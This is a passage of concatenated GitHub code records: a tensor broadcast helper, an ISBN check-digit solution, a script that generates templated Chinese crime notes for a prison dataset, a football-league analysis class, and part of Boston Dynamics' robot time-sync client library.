str_json_info()\n\n","repo_name":"icehap/Flasher_Measurements","sub_path":"LED_Measurements.py","file_name":"LED_Measurements.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36671684828","text":"from torch import Tensor\n\n\ndef right_broadcast_like(src: Tensor, dst: Tensor) -> Tensor:\n    num = len(dst.shape) - len(src.shape)\n    out = src\n    if num > 0:\n        for _ in range(num):\n            out = out.unsqueeze(-1)\n    return out\n","repo_name":"TinyZeaMays/JJF","sub_path":"lib/utils/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21738289771","text":"\"\"\"\nProblem description\n\nEvery formally published book has a corresponding ISBN. An ISBN consists of 9 digits,\n1 check digit and 3 separators, in the prescribed format \"x-xxx-xxxxx-x\",\nwhere \"-\" is the separator (the minus sign on the keyboard) and the last character is the check digit.\n\nFor example, 0-670-82162-4 is a standard ISBN. The first digit encodes the language the book\nis published in (e.g. 0 stands for English); the three digits after the first separator \"-\"\nidentify the publisher (e.g. 670 is Viking Press); the five digits after the second separator\nare the book's number within the publisher; the last character is the check digit.\n\nThe check digit is computed as follows:\n   multiply the first digit by 1, the second by 2, and so on, sum the products and take\n the result mod 11; the remainder is the check digit, and a remainder of 10 is written as\n the capital letter X. For example, the check digit 4 in the ISBN 0-670-82162-4 is obtained\n by multiplying the 9 digits 067082162, from left to right, by 1, 2, ..., 9 and summing,\n i.e. 0×1+6×2+……+2×9=158, then taking 158 mod 11 = 4 as the check digit.\n  \n Write a program that decides whether the check digit of the input ISBN is correct.\n If it is, print only \"Right\"; if it is wrong, print the corrected ISBN.\n\nInput format\n\n  A single line: a character sequence representing a book's ISBN (the input is guaranteed to match the ISBN format).\n\nOutput format\n\n  One line: if the check digit of the input ISBN is correct, print \"Right\";\n\totherwise print the corrected ISBN in the prescribed format (including the separators \"-\").\n\nApproach:\nRegular expressions would work here if you know them,\n\nbut since the problem guarantees the format, no regex is needed --\n\nonly the check digit has to be validated.\n\"\"\"\nISBN=input().strip()\nm,n,p,code=ISBN.split('-')\n\n\n# lst is a list holding the 9 digits\n# returns the check digit\ndef chkCode(lst):\n\tll=len(lst)\n\ts=0\n\tfor inx in range(ll):\n\t\ts+=(inx+1)*lst[inx]\n\tif s%11==10:\n\t\treturn 'X'\n\telse:\n\t\treturn str(s%11)\n\n# build the digit list\nlst=[]\nlst.append(m)\nlst.extend([v for v in n])\nlst.extend([j for j in p])\nlst=list(map(int,lst))\n\ngetcode=chkCode(lst)\nif getcode==code:\n\tprint(\"Right\")\nelse:\n\tprint(ISBN[:-1]+getcode)\n\n","repo_name":"Devinwon/master","sub_path":"coding-exercise/CCF/201312-2.py","file_name":"201312-2.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26473553262","text":"import utils.parse_config as u\nimport utils.database as db\nimport curPath\nimport utils.save_to_json as sava_to_json\nimport random\ndef save_to_txt(rate_his, file_path):\n    with open(file_path, 'w') as f:\n        for rate in rate_his:\n            f.write(\"%s \\n\" % rate)\nconfig = 
u.ReadConfig()\n\nthieves=config.get_tablename(\"thieves_name\")\nfraudsters=config.get_tablename(\"fraudsters_name\")\nposition=config.get_tablename(\"position_name\")\ndrug=config.get_tablename(\"drug_name\")\ntraffic=config.get_tablename(\"traffic_name\")\nrape=config.get_tablename(\"rape_name\")\nrob=config.get_tablename(\"rob_name\")\ndamage=config.get_tablename(\"damage_name\")\nintentkill=config.get_tablename(\"intentkill_name\")\ntables=[thieves,fraudsters,position,drug,traffic,rape,rob,damage,intentkill]\nprint(tables)\ncon = db.DB()\ndata_json=[]\ndef position_note():\n    a=[\"公职人员,\",\"公务员,\",\"某县县长\",\"村长,\",\"省委书记,\",\"省长,\",\"某市文化馆馆长,\",\"烟草局局长,\"]\n    money=[\"50万元\",\"100万元\",\"2亿\",\"2000万元\",\"1000多万\",\"500万\",\"300万元\",\"80万元\",\"300多万\",\"800万元\",\"1200万元\",\"1.5亿\"]\n    rea=[\"涉及金额{}\".format(random.choice(money)),\"贪污{}\".format(random.choice(money)),\"滥用公职,以权谋私,长期贪污腐败\"]\n    return random.choice(rea)\ndef drup_note(type):\n    rea=[type,\"因其家人从事贩毒,\",\"因从事毒品的贩卖,\",\"因长期从事毒品的贩卖\",\"因长期吸毒,\",\"因有很大毒瘾,\",\"因长期购买并使用毒品,\",\"因吸食毒品,\",\"因长期吸食毒品,\"]\n    p=\"被捕入狱\"\n    return random.choice(rea)+p\ndef rape_note():\n    tool=[\"单身,\",\"离婚,\",\"未婚,\",]\n    xing=[\"王\",\"张\",\"陈\",\"赵\",\"雷\",\"孙\",\"李\",\"任\",]\n    thing=[\"将受害人{}某强奸,\",\"将受害人{}某强奸,\",\"强奸{}某,\",\"强奸{}某某,\",\"强奸未遂,\"]\n    a=[\"强吻,猥亵妇女,\",\"强吻,猥亵{}某,\",\"猥亵{}某某,\",]\n    type=\"犯强奸罪\"\n    return random.choice(tool)+random.choice(thing).format(random.choice(xing))+\"还多次\"+random.choice(a)+type\ndef rob_note():\n    tool = [\"无生活来源,\",\"不务正业,\",\"好吃懒做,\",\"游手好闲,\",\"\",]\n    thing=[\"手机\",\"名贵手表\",\"包包\",\"现金\",\"名贵首饰\",\"项链\",\"金首饰\",\"金项链\",]\n    mod = [\"持刀抢劫他人{},\", \"尾随并抢劫他人{},\",\"\"]\n    type=\"犯抢劫罪\"\n    return random.choice(tool)+random.choice(mod).format(random.choice(thing))+type\ndef kill_note():\n    tool=[\"自己的亲生母亲\",\"他人\",\"同学\",\"朋友\",\"同村人\",\"老板\",\"上司\",\"同事\",\"亲人\"]\n    mod=[\"拿刀砍死{}\",\"拿刀将{}杀害\",\"与{}发生争执,并将其杀害\",\"将{}杀害\",\"与{}发生冲突,于是杀人\",\"将{}杀害,并将尸体藏匿\",\"将{}勒死杀害\"]\n    return random.choice(mod).format(random.choice(tool))\ndef damege_note():\n    tool=[\"具有精神病态,\",\"具有一定精神病态\",\"具有原发性精神病态,\",\"具有继发性精神病态,\"]\n    mod=\"犯故意伤害罪\"\n    return random.choice(tool)+mod\ndef fraudsters_note():\n    p=[\"电话\",\"网络\"]\n    tool=[\"实施{}诈骗\",]\n    return \"从事诈骗活动,\"+random.choice(tool).format(random.choice(p))\ndef thieves_note():\n    rea=[\"家庭教养方式不足,\",\"父母教养方式存在问题,\",\"缺乏父母管教,\",\"母亲教养不足,\",\"父亲教养不足,\",]\n    p=[\"加入盗窃团伙,实施盗窃\",\"半夜潜入房间实施盗窃\",\"长期从事偷窃,以盗窃为生\",\"趁他人不备盗窃,犯盗窃罪\",]\n    return random.choice(rea)+random.choice(p)\nif __name__ == '__main__':\n    name_set=set()\n    for i in range(len(tables)):\n        table=tables[i] # pick the table for this pass\n        # check how many rows this table has\n        sql = \"select * from {}\".format(table)\n        data=con.select(sql)\n        print(len(data))\n        con.add(\"alter table {} add note text(50);\".format(table)) # add the note column\n        if table==\"thieves\":\n            qid_start=0\n\n            # theft records\n            for j in range(1000):\n                adata=data[j]\n                id=adata[0]\n                name=adata[2]\n                age=adata[4]\n                note=name+\",\"+str(age)+\"岁,\"+thieves_note()\n                # print(desc)\n                sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n                # print(sql_updata)\n                con.updata(sql_updata)\n\n                adata_json = {}\n                adata_json[\"qid\"]=qid_start+int(id)\n                adata_json[\"type\"]=table\n                adata_json[\"note\"]=note\n                data_json.append(adata_json)\n                name_set.add(name)\n        if table==\"fraudsters\":\n            qid_start = 1000\n            # fraud records\n            for j in range(1000):\n                adata=data[j]\n                id=adata[0]\n                name=adata[4]\n                age=adata[6]\n                money=random.randint(10000,1000000)\n                note=name+\",\"+str(age)+\"岁,\"+fraudsters_note()\n                # print(desc)\n                sql_updata=\"update {} set note=\\\"{}\\\" 
where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"position\":\n qid_start = 2000\n #处理职务犯\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[3]\n type=adata[9]\n age=adata[10]\n note=\"职务犯\"+name+\",\"+str(age)+\"岁,\"+type+position_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"drug\":\n qid_start = 3000\n #处理贩毒\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n age=adata[3]\n edu=adata[4]\n type=adata[5]\n note=str(age)+\"岁,\"+edu+\"文化程度,\"+drup_note(type)\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n if table==\"traffic\":\n qid_start = 4000\n #处理交通肇事\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n note=name+\",\"+\"犯交通肇事逃逸罪,安全驾驶态度较差\"\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"rape\":\n qid_start = 5000\n #处理强奸\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n age = adata[4]\n note=name+\",\"+str(age)+\"岁,\"+rape_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table==\"rob\":\n qid_start = 6000\n #处理抢劫\n for j in range(1000):\n adata=data[j]\n id=adata[0]\n name=adata[2]\n age = adata[4]\n note=name+\",\"+str(age)+\"岁,\"+rob_note()\n # print(desc)\n sql_updata=\"update {} set note=\\\"{}\\\" where id={};\".format(table,note,int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table == \"damage\":\n qid_start = 7000\n # 故意伤害\n for j in range(1000):\n adata = data[j]\n id = adata[0]\n name = adata[2]\n age = adata[4]\n type = adata[7]\n note = name + \",\" + str(age) + \"岁,\" +damege_note()\n # print(desc)\n sql_updata = \"update {} set note=\\\"{}\\\" where id={};\".format(table, note, int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n if table == \"intentkill\":\n qid_start = 8000\n # 故意杀人\n for j in range(1000):\n adata = data[j]\n id = adata[0]\n name = adata[2]\n age = adata[4]\n type = adata[7]\n 
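# build the note: name, age, crime type, plus a randomly chosen homicide description\n            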
note = name + \",\" + str(age) + \"岁,\" + type+\",\"+kill_note()\n # print(desc)\n sql_updata = \"update {} set note=\\\"{}\\\" where id={};\".format(table, note, int(id))\n # print(sql_updata)\n con.updata(sql_updata)\n\n adata_json = {}\n adata_json[\"qid\"] = qid_start + int(id)\n adata_json[\"type\"] = table\n adata_json[\"note\"] = note\n data_json.append(adata_json)\n name_set.add(name)\n sava_to_json.save_json(data_json,curPath.mainPath()+\"/bert/data/data.json\")\n\n save_to_txt(name_set,curPath.mainPath()+\"/bert/stopwords/姓名年龄岁.txt\") #bert里面进行用的时候,去掉这些姓名等词语,所以提前保存停止词","repo_name":"renchaojun/prison","sub_path":"produce_note.py","file_name":"produce_note.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30421405266","text":"from pandas import merge, Series, DataFrame\n\nfrom dao.dao import DAO\nfrom league import League\nfrom util.util import mean_deviation\n\nclass LeagueAnalysis:\n\n\tdef __init__(self, league):\n\t\tself.league = league\n\n\tdef points_corr(self, df_tables, method=\"kendall\", n_head=None, precision=3):\n\t\t'''\n\t\tArgs:\n\t\t\tdf_tables: list of table dataframes\n\t\t\tmethod: ranking correlation method: 'spearman' or 'kendall'\n\t\t\tn_head: n firsts position for the table, if None all position will be considered\n\n\t\tReturns:\n\t\t\tan array with the correlations of team points between table dataframes (df_tables) for \n\t\t\tthe firsts positions clubs.\n\t\t'''\n\n\t\tif n_head is None:\n\t\t\tn_head = len(self.league.teams())\n\n\t\tcorrelations = []\n\n\t\tfor i in range(len(df_tables) - 1):\n\t\t\tdf1 = df_tables[i]\n\t\t\tdf2 = df_tables[i + 1]\n\t\t\t\n\t\t\tpoints1, points2 = self.paired_points(df1=df1, df2=df2, n_head=n_head)\n\t\t\tcorr = points1.corr(points2, method=method)\n\t\t\tcorrelations.append(corr)\n\t\t\n\t\treturn [float(round(corr, precision)) for corr in correlations]\n\n\tdef paired_points(self, df1, df2, n_head):\n\t\tdf1_points = df1.head(n_head)['Points'].tolist()\n\t\tdf1_teams = df1.head(n_head)[\"Team\"].tolist()\n\n\t\tdf2_points = []\n\n\t\tfor team in df1_teams:\n\t\t\tmapping_rank1_rank2 = df2[df2[\"Team\"] == team]['Points'].item()\n\t\t\tdf2_points.append(mapping_rank1_rank2)\n\n\t\treturn Series(df1_points), Series(df2_points)\n\n\tdef range_points_spread(self, dates, top_n_clubs):\n\t\trange_points_spread_list = []\n\t\tfor date in dates:\n\t\t\ttable = self.league.table(to_date=date).sort_values(by=\"Points\", ascending=False)\n\t\t\tpoints = table.head(top_n_clubs)[\"Points\"].tolist()\n\t\t\trange_points_spread_list.append(points[0] - points[-1])\n\n\t\treturn range_points_spread_list\n\n\tdef home_away_match_performance(self, team):\n\t\t'''\n\t\tArgs:\n\t\t\tteam:\n\t\t\t\tcompute performance for this team\n\n\t\tReturns:\n\t\t\thow frequent is for a team to win in away match the same points \n\t\t\tas in home match, aiganst the same team\n\t\t'''\n\n\t\tmatches = self.league.home_away_matches(team=team)\n\n\t\tstability_series = matches.apply(lambda row: self.home_away_stability(row), axis=1)\n\t\tstability = stability_series.value_counts()[True]\n\n\t\treturn stability\n\n\tdef home_away_stability(self, row):\n\t\tif row[\"TeamHG\"] > row[\"AigAG\"]:\n\t\t\tpoints_home = 3\n\t\telif row[\"TeamHG\"] == row[\"AigAG\"]:\n\t\t\tpoints_home = 1\n\t\telse:\n\t\t\tpoints_home = 0\n\n\t\tif row[\"TeamAG\"] > row[\"AigHG\"]:\n\t\t\tpoints_away = 3\n\t\telif row[\"TeamAG\"] == row[\"AigHG\"]:\n\t\t\tpoints_away = 
1\n\t\telse:\n\t\t\tpoints_away = 0\n\n\t\treturn points_home == points_away\n\n\tdef match_level(self, team):\n\t\tmatches = self.league.home_away_matches(team=team)\n\t\tpoints = self.league.points()\n\n\t\tmatch_points = merge(left=matches, right=points, left_on=\"Aiganst\", right_on=\"Team\", how='inner')\n\n\t\tprint()\n\t\tprint(points[[\"Team\", \"Points\"]])\n\t\tprint(match_points)\n\n\t\tvictories = self.oponnet_defeated_points(match_points)\n\t\tprint(round(victories[\"home\"].mean()), (victories[\"home\"]).tolist())\n\t\t\n\t\tties = self.oponnet_tied_points(match_points)\n\t\tprint(round(ties[\"home\"].mean()), (ties[\"home\"]).tolist())\n\t\t\n\t\tlooses = self.oponnet_wins_points(match_points)\n\t\tprint(round(looses[\"home\"].mean()), (looses[\"home\"]).tolist())\n\t\t\n\t\treturn None\n\n\n\tdef oponnet_defeated_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] > match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] > match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": away_wins_oponnent_pts[\"Points\"]}\n\n\tdef oponnet_tied_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] == match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] == match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": away_wins_oponnent_pts[\"Points\"]}\n\n\tdef oponnet_wins_points(self, match_points):\n\t\thome_wins_oponnent_pts = match_points[match_points['TeamHG'] < match_points['AigAG']]\n\t\taway_wins_oponnent_pts = match_points[match_points['TeamAG'] < match_points['AigHG']]\n\n\t\treturn {\"home\": home_wins_oponnent_pts[\"Points\"], \"away\": away_wins_oponnent_pts[\"Points\"]}\n\t\t\n\n\n\t\t \n","repo_name":"talestsp/league_analytics","sub_path":"league_analysis.py","file_name":"league_analysis.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13035580123","text":"import time\nfrom threading import Event, Lock, Thread\n\nfrom google.protobuf import duration_pb2\n\nfrom bosdyn.api import time_sync_pb2, time_sync_service_pb2_grpc\nfrom bosdyn.api.time_range_pb2 import TimeRange\nfrom bosdyn.util import (RobotTimeConverter, now_nsec, nsec_to_timestamp, parse_timespan,\n set_timestamp_from_nsec, timestamp_to_nsec)\n\nfrom .common import BaseClient, common_header_errors\nfrom .exceptions import Error\n\n\nclass TimeSyncError(Error):\n \"\"\"General class of errors for TimeSync non-response / non-grpc errors.\"\"\"\n\n\nclass NotEstablishedError(TimeSyncError):\n \"\"\"Client has not established time-sync with the robot.\"\"\"\n\n\nclass TimedOutError(TimeSyncError):\n \"\"\"Exceeded deadline to achieve time-sync.\"\"\"\n\n\nclass InactiveThreadError(TimeSyncError):\n \"\"\"Time-sync thread is no longer running.\"\"\"\n\n\nclass TimeSyncClient(BaseClient):\n \"\"\"A client for establishing time-sync with a server/robot.\"\"\"\n default_service_name = 'time-sync'\n service_type = 'bosdyn.api.TimeSyncService'\n\n def __init__(self):\n super(TimeSyncClient, self).__init__(time_sync_service_pb2_grpc.TimeSyncServiceStub)\n\n def get_time_sync_update(self, previous_round_trip, clock_identifier, **kwargs):\n \"\"\"Obtain an initial or updated timesync estimate with server.\n\n Args:\n previous_round_trip (bosdyn.api.TimeSyncRoundTrip): None on first rpc call, then\n 
fill out with previous response\n from server.\n clock_identifier (string): Empty on first call, assigned by server in first response.\n\n Raises:\n RpcError: Problem communicating with the robot.\n \"\"\"\n req = self._get_time_sync_update_request(previous_round_trip, clock_identifier)\n return self.call(self._stub.TimeSyncUpdate, req, None, common_header_errors,\n copy_request=False, **kwargs)\n\n def get_time_sync_update_async(self, previous_round_trip, clock_identifier, **kwargs):\n \"\"\"Async version of get_time_sync_update()\"\"\"\n req = self._get_time_sync_update_request(previous_round_trip, clock_identifier)\n return self.call_async(self._stub.TimeSyncUpdate, req, None, common_header_errors,\n copy_request=False, **kwargs)\n\n\n @staticmethod\n def _get_time_sync_update_request(previous_round_trip, clock_identifier):\n return time_sync_pb2.TimeSyncUpdateRequest(previous_round_trip=previous_round_trip,\n clock_identifier=clock_identifier)\n\n\ndef _get_time_sync_status_value(response):\n return response.time_sync_status_map\n\n\ndef robot_time_range_from_nanoseconds(start_nsec, end_nsec, time_sync_endpoint=None):\n \"\"\"Generate timespan as a TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n start_nsec nanoseconds since the Unix epoch or None\n end_nsec nanoseconds since the Unix epoch or None\n time_sync_endpoint Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n time_range = TimeRange()\n converter = time_sync_endpoint.get_robot_time_converter() if time_sync_endpoint else None\n\n def _convert_nsec(nsec):\n timestamp_proto = nsec_to_timestamp(int(nsec))\n if not time_sync_endpoint:\n return timestamp_proto\n return converter.robot_timestamp_from_local(timestamp_proto)\n\n # pylint: disable=no-member\n if start_nsec:\n time_range.start.CopyFrom(_convert_nsec(start_nsec))\n if end_nsec:\n time_range.end.CopyFrom(_convert_nsec(end_nsec))\n\n return time_range\n\n\ndef robot_time_range_from_datetimes(start_datetime, end_datetime, time_sync_endpoint=None):\n \"\"\"Generate timespan as a TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n start_datetime: timestamp.timestamp or None\n end_datetime: timestamp.timestamp or None\n time_sync_endpoint: Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n\n def _datetime_to_nsec(date_time):\n if date_time:\n return date_time.timestamp() * 1e9\n return None\n\n return robot_time_range_from_nanoseconds(_datetime_to_nsec(start_datetime),\n _datetime_to_nsec(end_datetime), time_sync_endpoint)\n\n\ndef timespec_to_robot_timespan(timespan_spec, time_sync_endpoint=None):\n \"\"\"Generate timespan as TimeRange proto, in robot time.\n\n If time_sync_endpoint is a TimeSyncEndpoint, the time_spec is in the local clock and will\n be converted to robot_time.\n If the input times are already in the robot clock, do not specify time_sync_endpoint and\n the times will not be converted.\n\n Args:\n timespan_spec '{val}-{val}' or '{val}' time spec string\n 
time_sync_endpoint Either TimeSyncEndpoint or None.\n\n Returns:\n return bosdyn.api.TimeRange time range in robot time\n \"\"\"\n start_datetime, end_datetime = parse_timespan(timespan_spec)\n return robot_time_range_from_datetimes(start_datetime, end_datetime, time_sync_endpoint)\n\n\n\n\nclass TimeSyncEndpoint:\n \"\"\"A wrapper that uses a TimeSyncClient object to establish and maintain timesync with a robot.\n\n This class manages internal state, including a clock identifier and previous best time sync\n estimates. This class automatically builds requests passed to the TimeSyncClient, so users\n don't have to worry about the details of establishing and maintaining timesync.\n\n This object is thread-safe.\n \"\"\"\n\n def __init__(self, time_sync_client):\n self._client = time_sync_client\n self._lock = Lock()\n # Access these using the lock.\n # These should be updated by replacement, not mutation so that they may be used\n # outside the lock after being accessed via the lock.\n self._locked_previous_round_trip = None\n self._locked_previous_response = None\n self._locked_clock_identifier = \"\"\n\n @property\n def response(self):\n \"\"\"The last response message from the time-sync service.\n\n Returns:\n The bosdyn.api.TimeSyncResponse proto last returned by the server, or None if unset.\n \"\"\"\n with self._lock:\n return self._locked_previous_response\n\n @property\n def has_established_time_sync(self):\n \"\"\"Checks if the client has successfully established time-sync with the robot.\n\n Returns:\n Boolean true if the previous time-sync update returned that time sync is OK.\n \"\"\"\n response = self.response\n # pylint: disable=no-member\n return response and response.state.status == time_sync_pb2.TimeSyncState.STATUS_OK\n\n @property\n def round_trip_time(self):\n \"\"\"The previous round trip time.\n\n Returns:\n Round trip time as google.protobuf.Duration proto if available, otherwise None.\n \"\"\"\n response = self.response\n if response is None:\n return None\n return response.state.best_estimate.round_trip_time\n\n @property\n def clock_identifier(self):\n \"\"\"The clock identifier for the instance of the time-sync client.\n\n Returns:\n A unique identifier for this client. 
Empty if get_new_estimate has not been called.\n \"\"\"\n with self._lock:\n return self._locked_clock_identifier\n\n @property\n def clock_skew(self):\n \"\"\"The best current estimate of clock skew from the time-sync service.\n\n Returns:\n The google.protobuf.Duration representing the clock skew.\n\n Raises:\n NotEstablishedError: Time sync has not yet been established.\n \"\"\"\n response = self.response\n # pylint: disable=no-member\n if not response or response.state.status != time_sync_pb2.TimeSyncState.STATUS_OK:\n raise NotEstablishedError\n return response.state.best_estimate.clock_skew\n\n def establish_timesync(self, max_samples=25, break_on_success=False):\n \"\"\"Perform time-synchronization until time sync established.\n\n Args:\n max_samples (int): The maximum number of times to attempt to establish time-sync\n through time-synchronization.\n break_on_success (bool): If true, stop performing the time-synchronization after\n time-sync is established.\n\n Return:\n Boolean true if valid timesync has been established.\n \"\"\"\n counter = 0\n while counter < max_samples:\n if break_on_success and self.has_established_time_sync:\n return True\n self.get_new_estimate()\n counter += 1\n return self.has_established_time_sync\n\n def _get_update(self):\n round_trip = None\n clock_identifier = None\n with self._lock:\n # Only add a round trip to the request along with a clock identifier, otherwise\n # the sever will respond with an invalid request error.\n # Responses with errors may not contain a clock identifier.\n # This may happen, for example, if the service was not yet ready at the time of\n # the request.\n if self._locked_clock_identifier:\n round_trip = self._locked_previous_round_trip\n clock_identifier = self._locked_clock_identifier\n return self._client.get_time_sync_update(previous_round_trip=round_trip,\n clock_identifier=clock_identifier)\n\n def get_new_estimate(self):\n \"\"\"Perform an update-cycle toward achieving time-synchronization.\n\n Return:\n Boolean true if valid timesync has been established.\n \"\"\"\n response = self._get_update()\n rx_time = now_nsec()\n\n # Record the timing information for this GRPC call to pass to the next update\n round_trip = time_sync_pb2.TimeSyncRoundTrip()\n # pylint: disable=no-member\n round_trip.client_tx.CopyFrom(response.header.request_header.request_timestamp)\n round_trip.server_rx.CopyFrom(response.header.request_received_timestamp)\n round_trip.server_tx.CopyFrom(response.header.response_timestamp)\n set_timestamp_from_nsec(round_trip.client_rx, rx_time)\n\n with self._lock:\n self._locked_previous_round_trip = round_trip\n # Store the response to get clock-skew estimate, etc.\n self._locked_previous_response = response\n self._locked_clock_identifier = response.clock_identifier\n\n return self.has_established_time_sync\n\n def get_robot_time_converter(self):\n \"\"\"Get a RobotTimeConverter for current estimate for robot clock skew from local time.\n\n Returns:\n An instance of RobotTimeConvertor for the time-sync client.\n\n Raises:\n NotEstablishedError: If time sync has not yet been established.\n \"\"\"\n return RobotTimeConverter(timestamp_to_nsec(self.clock_skew))\n\n def robot_timestamp_from_local_secs(self, local_time_secs):\n \"\"\"Convert a local time in seconds to a timestamp proto in robot time.\n\n Args:\n local_time_secs (float): Timestamp in seconds since the unix epoch (e.g.,\n from time.time()).\n\n Returns:\n google.protobuf.Timestamp representing local_time_secs in robot clock, or None if\n 
local_time_secs is None.\n\n Raises:\n NotEstablishedError: Time sync has not yet been established.\n \"\"\"\n if not local_time_secs:\n return None\n converter = self.get_robot_time_converter()\n return converter.robot_timestamp_from_local_secs(local_time_secs)\n\n\nclass TimeSyncThread:\n \"\"\"Background thread for achieving and maintaining time-sync to the robot.\"\"\"\n\n # After achieving time sync, update estimate every minute.\n DEFAULT_TIME_SYNC_INTERVAL_SEC = 60\n\n # When time-sync service is not yet ready, poll it at this interval\n TIME_SYNC_SERVICE_NOT_READY_INTERVAL_SEC = 5\n\n def __init__(self, time_sync_client):\n self._time_sync_endpoint = TimeSyncEndpoint(time_sync_client)\n self._lock = Lock()\n self._locked_time_sync_interval_sec = self.DEFAULT_TIME_SYNC_INTERVAL_SEC\n self._locked_should_exit = False # Used to tell the thread to stop running.\n self._locked_thread_exception = None # Stores any exception which ends the thread.\n self._event = Event() # Used to wait for next time sync, or until thread should exit.\n self._thread = None\n\n def __del__(self):\n # Stop the thread when this object is deleted.\n self.stop()\n\n def start(self):\n \"\"\"Start the thread.\"\"\"\n with self._lock:\n if self._thread and self._thread.is_alive():\n return\n self._locked_should_exit = False\n self._locked_thread_exception = None\n self._event.clear()\n self._thread = Thread(target=self._timesync_thread)\n self._thread.daemon = True\n self._thread.start()\n\n def stop(self):\n \"\"\"Shut down the thread if it is running.\"\"\"\n if self._thread:\n with self._lock:\n self._locked_should_exit = True # Signal the thread to exit.\n self._event.set() # Stop the thread's wait for the next time-sync update.\n self._thread.join() # Join the thread after it exits.\n self._thread = None\n\n @property\n def time_sync_interval_sec(self):\n \"\"\"Returns interval at which time-sync is updated in the thread.\"\"\"\n with self._lock:\n return self._locked_time_sync_interval_sec\n\n @time_sync_interval_sec.setter\n def time_sync_interval_sec(self, val):\n \"\"\"Set interval at which time-sync is updated in the thread after sync is established.\n\n Args:\n val (float): The interval (in seconds) that the time-sync estimate should be updated.\n \"\"\"\n with self._lock:\n self._locked_time_sync_interval_sec = val\n self._event.set()\n\n @property\n def should_exit(self):\n \"\"\"Returns True if thread should stop iterating.\"\"\"\n with self._lock:\n return self._locked_should_exit\n\n def wait_for_sync(self, timeout_sec=3.0):\n \"\"\"Wait for up to the given timeout for time-sync to be achieved\n\n Args:\n timeout_sec (float): Maximum time (seconds) to wait for time-sync to be achieved.\n\n Raises:\n InactiveThreadError: Thread is not running.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n if self.has_established_time_sync:\n return\n end_time_sec = time.time() + timeout_sec\n while not self.stopped:\n if self.endpoint.has_established_time_sync:\n return\n if time.time() > end_time_sec:\n raise TimedOutError\n time.sleep(0.1)\n thread_exc = self.thread_exception\n if thread_exc:\n raise thread_exc\n raise InactiveThreadError\n\n @property\n def has_established_time_sync(self):\n \"\"\"Checks if the client has successfully established time-sync with the robot.\n\n Returns:\n Boolean true if the previous time-sync update returned that time sync is OK.\n \"\"\"\n return 
